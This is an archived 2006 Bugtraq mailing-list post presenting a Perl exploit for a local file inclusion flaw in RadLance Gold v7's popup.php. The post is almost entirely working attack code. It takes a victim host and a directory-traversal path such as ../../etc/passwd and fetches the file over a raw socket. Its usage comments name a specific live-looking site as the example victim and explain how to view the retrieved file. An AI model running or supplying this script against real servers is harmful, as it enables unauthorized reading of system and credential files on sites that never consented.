lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list]
Message-ID: <BAY103-F1AE97FC1EFB124B3103DAF0A20@phx.gbl>
Date: Sun, 14 May 2006 11:39:37 +0000
From: "Hussain Salim" <bo_ali90@...mail.com>
To: bugtraq@...urityfocus.com
Subject: RadLance Local Inclusion Exploit


Discovered And Coded By Mr.CrackerZ


Exploit Code


___________



#!/usr/bin/perl
#Discovered and coded by Mr.CrackerZ ( Security Team )
#Contact me ( bo_ali90@...mail.com )
#Usage: radlance.pl <victim> <local file to read>
#Google: Powered by: RadLance Gold v7
#Tested Under RadLance Gold v7 ( Local Inclusion Exploit )
#Example: 
http://www.getabuilder.co.uk/popup.php?read=../../../../../../../../../etc/passwd
#Perl example: radlance.pl www.getabuilder.co.uk 
../../../../../../../../../etc/passwd
#################################################





use IO::Socket;
if(@ARGV < 2){
print "
+*************************************************************************+

Exploit Discovered and coded by Mr.CrackerZ ( Security Team )

radlance.pl <victim> <local file to read>

<victim> = www.example.com

<local file to read> = ../../../../../../../../../etc/passwd


+*************************************************************************+
";
exit();
}
#Local variables
$wbbserver = $ARGV[0];
$wbbserver =~ s/(http:\/\/)//eg;
$wbbhost = "http://".$wbbserver;
$port = "80";
$wbbtar = "/popup.php?read=";
$wbbxp = $ARGV[1];
$wbbreq = $wbbhost.$wbbtar.$wbbxp;
#Writing data to socket
print "\r\n";
print "+ Trying to connect: $wbbserver\n";
$wbb = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$wbbserver", 
PeerPort => "$port") || die "\n+ Connection failed...\n";
print $wbb "GET $wbbreq\n";
print $wbb "Host: $wbbserver\n";
print $wbb "Accept: */*\n";
print $wbb "Connection: close\n\n";
print "+ Connected!...\n";
print "\r\n";
print 
"+**********************************************************************+\n";
while($answer = <$wbb>) {

print <$wbb>;
printf "\r\n";

}

print 
"+**********************************************************************+\n\ncopy 
the code and save it as .html or .php depend the file u are trying 
to\naccess to , and if u saw the file cont so you got what u need :)\n";

_________________________________________________________________
Are you using the latest version of MSN Messenger? Download MSN Messenger 
7.5 today! http://join.msn.com/messenger/overview



Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ